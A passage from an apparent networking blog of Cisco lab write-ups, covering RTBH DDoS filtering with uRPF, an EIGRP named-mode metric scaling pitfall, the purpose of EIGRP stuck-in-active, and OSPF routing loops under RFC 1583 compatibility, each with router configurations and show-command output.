  neighbor 192.168.13.1 activate
  neighbor 192.168.13.1 send-community both
CE2#show run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.24.4 255.255.255.0
router bgp 4
 bgp router-id 4.4.4.4
 no bgp default ipv4-unicast
 neighbor 192.168.24.2 remote-as 12
 address-family ipv4
  network 4.4.4.4 mask 255.255.255.255
  neighbor 192.168.24.2 activate
  neighbor 192.168.24.2 send-community both
PE1#show run | section interface|router    
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.13.1 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.12.1 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 1.1.1.1
router bgp 12
 bgp router-id 1.1.1.1
 no bgp default ipv4-unicast
 neighbor 2.2.2.2 remote-as 12
 neighbor 2.2.2.2 update-source Loopback0
 neighbor 192.168.13.3 remote-as 3
 neighbor 192.168.13.3 disable-connected-check
 !
 address-family ipv4
  redistribute connected
  neighbor 2.2.2.2 activate
  neighbor 2.2.2.2 send-community both
  neighbor 192.168.13.3 activate
  neighbor 192.168.13.3 send-community both
PE2#show run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.24.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.25.2 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 2.2.2.2
router bgp 12
 bgp router-id 2.2.2.2
 no bgp default ipv4-unicast
 neighbor 1.1.1.1 remote-as 12
 neighbor 1.1.1.1 update-source Loopback0
 neighbor 192.168.24.4 remote-as 4
 neighbor 192.168.25.5 remote-as 5
 !
 address-family ipv4
  redistribute connected
  neighbor 1.1.1.1 activate
  neighbor 1.1.1.1 send-community
  neighbor 192.168.24.4 activate
  neighbor 192.168.24.4 send-community both
  neighbor 192.168.25.5 activate
  neighbor 192.168.25.5 send-community both

Attacker#show run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.25.5 255.255.255.0
router bgp 5
 bgp router-id 5.5.5.5
 no bgp default ipv4-unicast
 neighbor 192.168.25.2 remote-as 12
 address-family ipv4
  network 5.5.5.5 mask 255.255.255.255
  neighbor 192.168.25.2 activate
  neighbor 192.168.25.2 send-community both

First, let’s implement destination-based RTBH. Community of 12:666 would be the marker to discard the traffic through Null0.

PE1#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
 address-family ipv4
  neighbor 192.168.13.3 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
 match community RTBH
 set local-preference 200
 set ip next-hop 10.0.0.0
route-map RTBH permit 20
PE2#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
 address-family ipv4
  neighbor 192.168.24.4 route-map RTBH in
  neighbor 192.168.25.5 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
 match community RTBH
 set local-preference 200
 set ip next-hop 10.0.0.0
route-map RTBH permit 20

Attacker has initiated the DDoS attack on CE1 3.3.3.3/32:

Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/48/52 ms

In order to block the offending traffic, CE1 has to announce 3.3.3.3/32 with community of 12:666.

CE1#show run | section route-map|router bgp
router bgp 3
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255 route-map RTBH
route-map RTBH permit 10
 set community 12:666

The attack has ceased on PE2 due to the data plane filter:

Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
UUUUU
Success rate is 0 percent (0/5)

The important feature of RTBH – traffic is discarded as soon as possible on provider edge, thus limiting the impact on the ISP network.

PE2#show ip bgp 3.3.3.3/32
BGP routing table entry for 3.3.3.3/32, version 27
Paths: (1 available, best #1, table default)
  Advertised to update-groups:
     3         
  Refresh Epoch 2
  3
    10.0.0.0 from 1.1.1.1 (1.1.1.1)
      Origin IGP, metric 0, localpref 200, valid, internal, best
      Community: 12:666
PE2#
PE2#show ip cef 3.3.3.3/32 det
3.3.3.3/32, epoch 0, flags rib only nolabel, rib defined all labels
  recursive via 10.0.0.0
    attached to Null0

There is an unfortunate side effect though – CE2 has lost connectivity as well:

CE2#ping 3.3.3.3 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
UUUUU
Success rate is 0 percent (0/5)

Destination-based RTBH might be a good tool to limit the impact of DDoS attack to gain additional information about attacker. Let’s assume that CE1 already knows the source IP address – 5.5.5.5/32. Time to introduce source-based RTBH with the addition of loose uRPF!

PE1#show run int f0/0
interface FastEthernet0/0
 ip verify unicast source reachable-via any
PE2#show run int f0/0  
interface FastEthernet0/0
 ip verify unicast source reachable-via any
PE2#show run int f0/1
interface FastEthernet0/1
 ip verify unicast source reachable-via any

ISP is set up, so let’s swap the announcements on CE1 to trigger source-based RTBH:

CE1#show run | s ip route|router bgp
router bgp 3
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  network 5.5.5.5 mask 255.255.255.255 route-map RTBH
ip route 5.5.5.5 255.255.255.255 Null0

ISP is filtering the traffic from attacker on the entry points to its network:

PE2#show ip bgp 5.5.5.5/32
BGP routing table entry for 5.5.5.5/32, version 29
Paths: (2 available, best #1, table default)
  Advertised to update-groups:
     3         
  Refresh Epoch 3
  3
    10.0.0.0 from 1.1.1.1 (1.1.1.1)
      Origin IGP, metric 0, localpref 200, valid, internal, best
      Community: 12:666
  Refresh Epoch 4
  5
    192.168.25.5 from 192.168.25.5 (5.5.5.5)
      Origin IGP, metric 0, localpref 100, valid, external
PE2#
PE2#show ip cef 5.5.5.5/32 det
5.5.5.5/32, epoch 0, flags rib only nolabel, rib defined all labels
  recursive via 10.0.0.0
    attached to Null0

This time, however, only the offending party is neutralized, valid connections are still operational:

CE2#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 44/53/72 ms
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
.....
Success rate is 0 percent (0/5)

In production you would not probably allow customers to announce the prefixes in such a direct way, one would rather restrict the allowed prefixes or even use a dedicated router within ISP to generate the prefixes for RTBH. Nevertheless, the underlying idea of loose uRPF combined with static route to Null0 stays the same, so I hope this post bridges the gap between the uRPF mode and its use case.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn, Twitter

EIGRP named mode: migration pitfall

Let’s imagine that you’ve got an unstoppable urge to upgrade your network software to the latest available version as well as to adopt all the best practices available (you’re not looking for a new job just yet). Your first Guinea pig is EIGRP in classic mode – you can’t wait to bump it to named mode because of all shiny new features. Even better, you can do it with just a single eigrp upgrade-cli command – couldn’t be easier, what could possibly go wrong? As you might have guessed from my previous posts, such an upgrade could wreck your network in certain circumstances.

What could be simpler than four routers? Exactly, three routers! Each of them is running EIGRP, R1 & R3 – classic mode, while R2 has just finished upgrading to named mode.

R1#show run | section router eigrp|interface
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router eigrp 1
 network 0.0.0.0
R3#show run | section router eigrp|interface
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
router eigrp 1
 network 0.0.0.0
R2#show run | section router eigrp|interface
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router eigrp NAMED
 address-family ipv4 unicast autonomous-system 1
  network 0.0.0.0

As you probably expect, there is nothing criminal just yet, R3 is still able to reach R1 without hiccups:

R3#show ip route eigrp
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/158720] via 192.168.23.2, 00:03:32, FastEthernet0/1
      2.0.0.0/32 is subnetted, 1 subnets
D        2.2.2.2 [90/28160] via 192.168.23.2, 00:03:37, FastEthernet0/1
D     192.168.12.0/24 [90/30720] via 192.168.23.2, 00:03:37, FastEthernet0/1
R3#  
R3#ping 1.1.1.1 source lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/28/36 ms

So far so good, isn’t it? However, just as you preparing to hit upgrade-cli on yet another router, there is a request coming in to deprioritize 1.1.1.1/32 for some kind of traffic engineering. You want it out of your way ASAP, so you adjust the bandwidth on the loopback:

R1(config)# interface lo0
R1(config-if)# bandwidth ?
  <1-10000000>   Bandwidth in kilobits
  inherit        Specify how bandwidth is inherited
  qos-reference  Reference bandwidth for QOS test
  receive        Specify receive-side bandwidth

R1(config-if)# bandwidth 1

KABOOM! R3 has just lost its connectivity to R1:

R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
UUUUU
Success rate is 0 percent (0/5)
R3#
R3#show ip route eigrp 
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/2560133120] via 192.168.23.2, 00:00:56, FastEthernet0/1
      2.0.0.0/32 is subnetted, 1 subnets
D        2.2.2.2 [90/28160] via 192.168.23.2, 00:09:42, FastEthernet0/1
D     192.168.12.0/24 [90/30720] via 192.168.23.2, 00:09:42, FastEthernet0/1

EIGRP must be the culprit, however, the route is still in RIB with worse metric as expected.

R3#traceroute 1.1.1.1 source lo0 numeric 
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.23.2 12 msec 16 msec 16 msec
  2 192.168.23.2 !H  !H  !H

R2, on the other hand, ignores your efforts to squeeze the traffic through it, because…

R2#show ip route eigrp
<output omitted>
      3.0.0.0/32 is subnetted, 1 subnets
D        3.3.3.3 [90/2662400] via 192.168.23.3, 00:14:07, FastEthernet0/1

It has lost the route!

However, the loss is not quite complete as it may look like. The prefix is still in EIGRP topology table with perfectly valid metrics:

R2#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 VR(NAMED) Topology Entry for AS(1)/ID(2.2.2.2) for 1.1.1.1/32
  State is Passive, Query origin flag is 1, 0 Successor(s), FD is Infinity, RIB is 4294967295
  Descriptor Blocks:
  192.168.12.1 (FastEthernet0/0), from 192.168.12.1, Send flag is 0x0
      Composite metric is (655694233600/655687680000), route is Internal
      Vector metric:
        Minimum bandwidth is 1 Kbit
        Total delay is 5100000000 picoseconds
        Reliability is 255/255
        Load is 1/255
        Minimum MTU is 1500
        Hop count is 1
        Originating router is 1.1.1.1

The data seems to be an order. So far we’ve got two mysteries on our hands:

  1. Why R2 has lost its route?
  2. Why R3 has NOT lost its route?

The first question directly affects availability, so we tackle this one first. Notice anything unusual about EIGRP metrics? It’s way bigger than “RIB is 4294967295” which is the upper bound of 32-bit RIB metrics. EIGRP cannot squeeze its 64-bit wide metric into 32-bit RIB metric, so the route is not installed. Solution? Scale down EIGRP metric before putting it into RIB by using metric rib-scale,which is equal to 128 by default:

R2#show ip protocols 
Routing Protocol is "eigrp 1"
  Outgoing update filter list for all interfaces is not set
  Incoming update filter list for all interfaces is not set
  Default networks flagged in outgoing updates
  Default networks accepted from incoming updates
  EIGRP-IPv4 VR(NAMED) Address-Family Protocol for AS(1)
    Metric weight K1=1, K2=0, K3=1, K4=0, K5=0 K6=0
    Metric rib-scale 128
    Metric version 64bit
    NSF-aware route hold timer is 240
    Router-ID: 2.2.2.2
    Topology : 0 (base) 
      Active Timer: 3 min
      Distance: internal 90 external 170
      Maximum path: 4
      Maximum hopcount 100
      Maximum metric variance 1
      Total Prefix Count: 5
      Total Redist Count: 0

  Automatic Summarization: disabled
  Maximum path: 4
  Routing for Networks:
    0.0.0.0
  Routing Information Sources:
    Gateway         Distance      Last Update
    192.168.12.1          90      00:17:36
    192.168.23.3          90      00:17:36
  Distance: internal 90 external 170

Guess what? 128 is still not enough to bring  655694233600 to 32-bit number, 160 seems to do the trick though:

R2(config)#router eigrp NAMED  
R2(config-router)#address-family ipv4 autonomous-system 1
R2(config-router-af)#metric rib-scale 160
R2#show ip route eigrp 
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/4098088960] via 192.168.12.1, 00:00:49, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
D        3.3.3.3 [90/2129920] via 192.168.23.3, 00:00:49, FastEthernet0/1

R3 is able to reach 1.1.1.1/32 again as well:

R3#ping 1.1.1.1 so lo 0                  
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/32/52 ms

So, the first mystery is declassified now. What about the second on: why on earth did R3 retain the route after R2 stopped using it? It’s not an idle question though: such a behaviour is bound to confuse troubleshooting engineer, who is led to believe that routing is still intact, since the proper route is installed in RIB.

After EIGRP router loses all of its successor routes, it runs a synchronization algorithm called DUAL. Our case is not an exception, so let’s walk the process between R2 and R3:

  1. R2 loses the successor for 1.1.1.1/32, because it receives Query from R1, so R2 sends the Query of its own towards R3.

Notice the metric: delay corresponds to the actual value on R2 instead of Infinity constant.

  1. R3 updates its topology with the received metric components:
R3#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 Topology Entry for AS(1)/ID(3.3.3.3) for 1.1.1.1/32
  State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560133120
  Descriptor Blocks:
  192.168.23.2 (FastEthernet0/1), from 192.168.23.2, Send flag is 0x0
      Composite metric is (2560133120/2560130560), route is Internal
      Vector metric:
        Minimum bandwidth is 1 Kbit
        Total delay is 5200 microseconds
        Reliability is 255/255
        Load is 1/255
        Minimum MTU is 1500
        Hop count is 2
        Originating router is 1.1.1.1

Since R3 has no alternatives to R2 and thus no possible EIGRP neighbours to query further, it responds back with the Infinity metric due to split horizon rule:

  1. R2 receives all Reply to outstanding Query, so it is able to select the loop-free route. The only available one cannot squeeze into RIB, so R2 is left with no route.

Fun fact: if you flap RIB scale config so that R2 loses the existing route, Query from R2 indicates route loss properly:

The reason for such a different processing seems to be simple: the initial Query is triggered by the Query from successor R1 before RIB update is attempted (no reason to specify Infinity metric); the second Query is performed after proper route loss from RIB perspective. The initial Query cannot trigger RIB update because routing information has to be updated via DUAL first. I reckon there could be two solutions to that:

  1. either send Update with Infinity metric after the route fails to be installed in RIB
    or
  2. always send Query with Infinity metric (which is the approach in EIGRP RFC).

Is it a likely failure scenario? Not really, modern networks make it difficult to end up with a metric high enough to get an out-of-bounds value. However, it’s still a valid scenario, especially in case of lousy metric engineering. The prevention is well-known – pilot testing and maintenance windows with automated predefined checks.

Follow on Telegram, LinkedIn, Twitter

EIGRP SIA – why?

It’s very likely that you already know what EIGRP stuck-in-active (SIA) feature means. Just a quick recap: if a router does not get a Reply message for previously sent Query within Active timer (3 minutes by default), it tears down the adjacency with the “stuck” neighbour; in the meantime the router probes its neighbours with SIA-Query, resetting Active timer if there is SIA-Reply from the neighbour. Sounds simple, right? Just another failsafe to protect network from a router that might go haywire. Let me ask you a long multi-question though:

Why SIA is required – there is no way to disable it? Isn’t it enough to expire Holddown timer on the stuck neighbour and consider its Reply unnecessary?

Well, the reply really depends on the viewpoint (Cisco’s “it depends”, uh-huh). Let’s see it on an example:

In such a setup there is absolutely no way SIA would be needed. Let’s imagine that R3 stops sending EIGRP packets for some reason and 1.1.1.1/32 on R1 goes down:

  1. R1 would send a Query for 1.1.1.1/32 to R2;
  2. R2 would send a Query for 1.1.1.1/32 to R3, however, it will never get a Reply;
  3. There would be a few unsuccessful EIGRP retransmits from R2 towards R3;
  4. Either Holddown timer expires (15s by default) or number of retransmits reaches 16 (only Cisco knows how long);
  5. R2 tears down neighbourship with R3 and sends Reply back to R1;
  6. Active timer on R1 never comes even close to expiration (3 minutes) so the 1.1.1.1/32 in Active state is removed.

Remember, however, that EIGRP was designed really long time ago – when serial links were ubiquitous. The most important feature of these links for this discussion – relatively long distance and high delay as a result. Although serial links are actively upgraded, there is still a similar connection – radiolinks. Consider the following setup:

The only non-default thing is the serial link using Frame-Relay for encapsulation.

R1#sho run | s interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.14.1 255.255.255.0
router eigrp 1
 network 0.0.0.0
R2#show run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface Serial4/0
 ip address 192.168.23.2 255.255.255.0
 encapsulation frame-relay
 no keepalive
 frame-relay interface-dlci 100
router eigrp 1
 network 0.0.0.0
R3#show run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface Serial4/0
 ip address 192.168.23.3 255.255.255.0
 encapsulation frame-relay
 no keepalive
 frame-relay interface-dlci 100
router eigrp 1
 network 0.0.0.0

Let’s try to run the scenario without SIA involved. The feature was introduced in 12.1(5) release so any 12.0 software should do. Although we cannot drop Queries specifically, we can discard all unicast packets to achieve the following: drop Queries and accept Hello. As a result, R2 would consider R3 to have failed based on Active timer (180 seconds by default) and not on Holddown timer (also 180 seconds by default). Although it seems like a setup at the first glance, I suggest holding on to it for some time.

R3#show ip access-lists
Extended IP access list NOUNICAST
    10 permit ip any 224.0.0.0 15.255.255.255
    20 deny ip any any

Now, let’s bring down 1.1.1.1/32 and activate the ACL on R3:

R3(config)#interface s4/0
R3(config-if)#ip access-group NOUNICAST in
R1(config)#iinterface lo0
R1(config-if)#sh

Now R1 considers the route to be in Active state.

R1# show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
       r - Reply status

A 1.1.1.1/32, 1 successors, FD is Infinity
    1 replies, active 00:00:07, query-origin: Local origin
      Remaining replies:
         via 192.168.12.2, r, FastEthernet0/0

After 3 minutes R1 should flush the route because by that moment it has received no Reply from R2 as there was no response from R3. However, this is not the case:

R1#show ip eigrp topology active 
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
       r - Reply status

A 1.1.1.1/32, 1 successors, FD is Inaccessible
    1 replies, active 00:03:05, query-origin: Local origin
         via Connected (Infinity/Infinity), Loopback0
    Remaining replies:
         via 192.168.12.2, r, FastEthernet0/0
R1#show ip eigrp topology active 
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Is there anything wrong with the configuration? I don’t think so. However, let’s get back to the failure condition based on Active timer instead of Holddown timer. Imagine that there are a bunch of other routers between R1 and R2, all using serial links and thus contributing to overall delay. May there be just a slight difference between 1.1.1.1/32 going down (and starting Active timer) and last Hello from R3 arriving (refreshing Holddown timer) that is covered completely by that delay? Definitely so:

  1. Although R2 might terminate neighbourship with R3 after 180 seconds, there is still a propagation delay for that event to reach R1.
  2. With a bit of “luck”, last Hello and disapperance of 1.1.1.1/32 would line up.

As soon as R2 prepares the Reply to be sent back to R1, Active timer on R1 expires and R1 resets the neighbourship with R2, at least according to the description of DUAL. As you could imagine, such a behaviour causes chain flapping of EIGRP neighbourships all around the network, just because there are high-delay links and a rogue malfunctioning router.

So why did we filter only unicast packets instead of dropping all EIGRP datagrams? Well, it would have required me to initiate the events at the same time right after last Hello from R3 was received. Although it’s possible with some automation, using Active timer instead removed the delay between my brain and the keyboard completely from equation while still providing us with the same result.

However, that’s not what we received during the test. I’ll have to speculate a little bit here as I don’t have a strict explanation for it, only suggestion.

  1. It’s possible to alleviate the problem by increasing the gap between default values of Active and Holddown timers. However, feasibility of such a method really depends on the total delay between the routers so I’d consider it to be a workaround. It seems that IOS 12.0 implements exactly this behaviour; version 11 could have provided different results but I could not find the image.
  2. The proper solution to the problem at hand is SIA. The idea is simple: separate prefix availability check (Query) from neighbour availability check (SIA-Query). Such an approach incurs no tangible dependency on total delay compared to timer tuning. Besides, it is generally a good idea to separate functions and not to overload them extensively.

Does it really matter in the modern world, especially since SIA cannot be disabled? Most likely not, to be honest, unless you run a very outdated IOS version (SIA would be the least of your concerns in such a case though). Understanding the reason for a feature to be implemented makes me feel good – so maybe such a knowledge would make someone feel good as well.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn

OSPFv2: extra routing loops

Lately I’ve covered one of the reasons for RFC 2328 to emerge. However, that’s not the only scenario when OSPF calculations, compliant with RFC 1583, can lead to routing loops. If you’ve peeked at RFC 2178, then you probably know what’s coming next.

Besides fixing the metric for aggregate routes, RFC 2328 also changed the best path selection process for external routes.

Otherwise, compare the cost of this new AS external path to the ones present in the table. Type 1 external paths are always shorter than type 2 external paths. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths are compared by looking at the advertised type 2 metrics, and then if necessary, the distance to the forwarding addresses.

RFC 1583, section 16.4

Compare the AS external path described by the LSA with the existing paths in N’s routing table entry, as follows. If the new path is preferred, it replaces the present paths in N’s routing table entry. If the new path is of equal preference, it is added to N’s routing table entry’s list of paths.

(a) Intra-area and inter-area paths are always preferred over AS external paths.

(b) Type 1 external paths are always preferred over type 2 external paths. When all paths are type 2 external paths, the paths with the smallest advertised type 2 metric are always preferred.

(c) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, and RFC1583Compatibility is set to “disabled”, select the preferred paths based on the intra-AS paths to the ASBR/forwarding addresses, as specified in Section 16.4.1.

(d) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, select the preferred path based on a least cost comparison. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths advertising equal type 2 metrics are compared by looking at the distance to the forwarding addresses.

RFC 2328, section 16.4
  • Intra-area paths using non-backbone areas are always the most preferred.
  • The other paths, intra-area backbone paths and inter-area paths, are of equal preference.
RFC 2328, section 16.4.1

Long story short:

  1. RFC 1583 compares same routes from different ASBR solely based on metric.
  2. RFC 2328 prefers intra-area ASBRs over the rest; if there is a tie, only then it compares the costs to ASBRs.

So the selection decisions of interest are:

  1. intra-area ASBR preference;
  2. no distinction between intra-area backbone and inter-area ASBRs.

Consider the following setup:

The ASBRs peer with BGP node to exchange a few prefixes: receive 1.1.1.1/32 and announce 3.3.3.3/32. ASBRs also announce a default route into OSPF domain. Two links have non-default costs, they are marked in red. Apart from that, no special configuration is present, everything is left by default.

BGP#sho run | section interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.16.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.12.1 255.255.255.0
router bgp 1
 no bgp default ipv4-unicast
 neighbor 192.168.12.2 remote-as 100
 neighbor 192.168.16.6 remote-as 100
 !
 address-family ipv4
  network 1.1.1.1 mask 255.255.255.255
  neighbor 192.168.12.2 activate
  neighbor 192.168.16.6 activate
ASBR1#sho run | s interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.23.2 255.255.255.0
 ip ospf 1 area 0
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.12.2 255.255.255.0
router ospf 1
 default-information originate always
router bgp 100
 no bgp default ipv4-unicast
 neighbor 192.168.12.1 remote-as 1
 !
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  neighbor 192.168.12.1 activate
ASBR2#sho run | section interface|router
interface Loopback0
 ip address 6.6.6.6 255.255.255.255
 ip ospf 1 area 1
interface FastEthernet0/0
 ip address 192.168.16.6 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.56.6 255.255.255.0
 ip ospf 1 area 1
interface FastEthernet1/0
 ip address 192.168.46.6 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 100
router ospf 1
 default-information originate always
router bgp 100
 no bgp default ipv4-unicast
 neighbor 192.168.16.1 remote-as 1
 !
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  neighbor 192.168.16.1 activate
ABR1#sho run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.45.4 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet0/1
 ip address 192.168.34.4 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet1/0
 ip address 192.168.46.4 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 100
router ospf 1
ABR2#sho run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet0/1
 ip address 192.168.56.5 255.255.255.0
 ip ospf 1 area 1
router ospf 1
R#sho run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.23.3 255.255.255.0
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.34.3 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0

Obviously, the configuration is pretty innocent, BGP should be able to reach out to 3.3.3.3/32 by using 1.1.1.1 as a source address.

BGP#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
.....
Success rate is 0 percent (0/5)

However, that’s not the case. Maybe some routes are missing along the way?

BGP#traceroute 3.3.3.3 source 1.1.1.1
Type escape sequence to abort.
Tracing the route to 3.3.3.3
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.16.6 12 msec 24 msec 20 msec
  2 192.168.56.5 56 msec 16 msec 36 msec
  3  *  *  * 
<output omitted>

It seems that ABR1 is dropping the packets. However, that’s not really the case if one runs a traceroute from R:

R#traceroute 1.1.1.1 source 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.4 16 msec 16 msec 20 msec
  2 192.168.34.3 20 msec 24 msec 16 msec
  3 192.168.34.4 32 msec 36 msec 40 msec
  4 192.168.34.3 36 msec 40 msec 36 msec
<you get the idea>

According to the topology, R selects a proper default route towards ASBR2:

R#sho ip ospf border-routers    

            OSPF Router with ID (3.3.3.3) (Process ID 1)


		Base Topology (MTID 0)

Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route

i 4.4.4.4 [1] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 5.5.5.5 [2] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 2.2.2.2 [10] via 192.168.23.2, FastEthernet0/0, ASBR, Area 0, SPF 12
I 6.6.6.6 [3] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
I 6.6.6.6 [101] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12

ABR1, though, goes haywire:

ABR1#sho ip ospf border-routers 

            OSPF Router with ID (4.4.4.4) (Process ID 1)


		Base Topology (MTID 0)

Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route

i 5.5.5.5 [101] via 192.168.46.6, FastEthernet1/0, ABR, Area 1, SPF 8
i 5.5.5.5 [1] via 192.168.45.5, FastEthernet0/0, ABR, Area 0, SPF 9
i 2.2.2.2 [11] via 192.168.34.3, FastEthernet0/1, ASBR, Area 0, SPF 9
i 6.6.6.6 [100] via 192.168.46.6, FastEthernet1/0, ASBR, Area 1, SPF 8

Take a very close look at the cost towards ASBR2 from both points of view. R selects the path via ABR2 with the cost of 3; however, ABR1 knows nothing about path through ABR2 and sees only the cost of 101. The reason for such a behavour is relatively simple: ASBR2 and ABR1 are in the same area so ABR1 prefers intra-area route. As a consequence, the preference for ASBR is yet again changed for transit packet that results in a routing loop.

Let’s switch over to RFC 2328 on all the routers in the domain:

R(config)#router ospf 1
R(config-router)#no compatible rfc1583
R#traceroute 1.1.1.1 so 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.4 20 msec 32 msec 12 msec
  2 192.168.46.6 12 msec 20 msec 8 msec
  3 192.168.16.1 4 msec 28 msec 16 msec
ABR1#sho ip ro os                              
<output omitted>
Gateway of last resort is 192.168.46.6 to network 0.0.0.0

O*E2  0.0.0.0/0 [110/1] via 192.168.46.6, 00:02:00, FastEthernet0/1
<output omitted>

Although the loop is defeated at last, we still face suboptimal routing. R still considers routes towards ASBR1 (backbone intra-area) and ASBR2 (inter-area) to be equal so it proceeds to comparing the costs. Wouldn’t it be better to just prefer backbone route over inter-area? This was exactly the idea in RFC 2178:

